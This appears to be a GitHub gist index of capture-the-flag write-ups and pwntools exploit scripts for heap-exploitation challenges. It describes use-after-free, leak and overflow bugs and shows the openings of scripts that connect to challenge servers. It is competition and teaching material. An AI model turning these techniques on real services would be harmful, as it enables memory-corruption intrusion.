Skip to content

Instantly share code, notes, and snippets.

View 1_stringer_writeup.md

Stringer (18 solves)

Challenge from RCTF, prequals to XCTF.

Bugs

There are 2 bugs in the program : the first is an obvious UAF. The second is no NULL termination immediately after our input, allowing us to leak. NULL byte terminates at buf + size - 1, read loop breaks if buf == "\n"

However, leaking is tricky since program uses calloc, which sets the newly allocated heap chunk to 0x00.

View gogogadget_writeup.md

GoGoGadget (1 solve)

Tool credits : @scwuaptx, pwngdb for making public awesome malloc research

Layout

*------------------------------*
          Hi Inspector!
View null_writeup.md

NULL ( 17-18 solves)

Challenge makes a thread to do the job. So , a thread_arena is created on a new mmap_segment.

Bug

Overflow in read function :

 for ( i = 0LL; ; i += v3 )
  {
View exploit_sapeloshop.py
#!/usr/bin/python
from pwn import *
elf = ELF("./libc-2.23.so")
#r = remote("http://sapeloshop.teaser.insomnihack.ch",80)
r = remote('sapeloshop.teaser.insomnihack.ch', 80)
#r = process("./sapeloshop",env={"LD_PRELOAD":"./libc-2.23.so"})
raw_input()
i = int("3d714", 16)
View exploit_readme.py
#!/usr/bin/python
from pwn import *
p = remote("35.198.130.245", 1337)
#p = process("./readme_revenge")
raw_input()
#name = "A"*920
name = p64(0x00) # Pass NULL Check.
name += "XXXX"
View exploit_memo.py
#!/usr/bin/python
from pwn import *
elf = ELF("./libc-2.23.so")
p = remote("159.203.116.12", 8888)
#p = process("./memo",env={"LD_PRELOAD":"./libc-2.23.so"})
raw_input()
def menu():
p.recvuntil(">")
View exploit_left.py
#!/usr/bin/python
from pwn import *
rol1 = lambda val, r_bits, max_bits: \
(val << r_bits%max_bits) & (2**max_bits-1) | \
((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
ror1 = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
View exploit_secure.py
#!/usr/bin/python
from pwn import *
p = remote("secure_keymanager.pwn.seccon.jp",47225)
#p = process("./secure_keymanager",env={"LD_PRELOAD" : "./libc-2.23.so"})
raw_input()
def menu():
p.recvuntil(">>")
You can’t perform that action at this time.